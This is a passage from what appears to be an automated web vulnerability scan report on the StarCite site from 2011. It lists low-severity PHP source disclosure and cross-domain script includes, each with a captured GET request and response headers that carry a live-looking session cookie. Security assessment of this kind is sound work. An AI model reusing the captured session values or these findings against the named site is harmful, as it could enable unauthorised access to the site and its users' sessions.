...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.6. http://www2.starcite.com/starcite/planners/howitworks  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/planners/howitworks

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/planners/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:13 GMT;path=/
Content-Length: 26501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.7. http://www2.starcite.com/starcite/planners/requestmoreinformation  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/planners/requestmoreinformation

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/planners/requestmoreinformation HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:00 GMT;path=/
Content-Length: 52367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.8. http://www2.starcite.com/starcite/resource/findresources  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/resource/findresources

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/resource/findresources HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:59 GMT;path=/
Content-Length: 29216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.9. http://www2.starcite.com/starcite/suppliers/howitworks  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/suppliers/howitworks

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/suppliers/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:12 GMT;path=/
Content-Length: 25233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.10. http://www2.starcite.com/starcite/whatwedo/ourtechnology  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/ourtechnology

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/whatwedo/ourtechnology HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:50 GMT;path=/
Content-Length: 23419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.11. http://www2.starcite.com/starcite/whatwedo/overview  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/overview

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/whatwedo/overview HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:21:56 GMT;path=/
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.12. http://www2.starcite.com/starcite/whatwedo/starcitenetwork  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/starcitenetwork

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/whatwedo/starcitenetwork HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:51 GMT;path=/
Content-Length: 21350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

4. Cross-domain script include  previous  next
There are 35 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www2.starcite.com/starcite/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/ HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; expires=Tue, 25 Jan 2011 17:30:23 GMT; path=/; domain=.www2.starcite.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:30 GMT;path=/
Content-Length: 39548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.2. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/modules/meetings1to1/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/Solutionvideo/modules/meetings1to1/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:48 GMT
Server: Apache
Last-Modified: Mon, 26 Apr 2010 20:37:10 GMT
ETag: "1000000003200-dd5-48529bdc203b0"
Accept-Ranges: bytes
Content-Length: 3541
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Starcite
...[SNIP]...
<link rel="stylesheet" type="text/css" media="all" href="css/screen.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

4.3. http://www2.starcite.com/starcite/customerlogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customerlogin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/customerlogin HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.4. http://www2.starcite.com/starcite/customers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/customers HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:41 GMT;path=/
Content-Length: 20570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.5. http://www2.starcite.com/starcite/destinationsolutions/finddestinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.6. http://www2.starcite.com/starcite/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/home HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:59 GMT;path=/
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.7. http://www2.starcite.com/starcite/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/jobs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/jobs HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:23 GMT;path=/
Content-Length: 17352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.8. http://www2.starcite.com/starcite/locations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/locations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/locations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
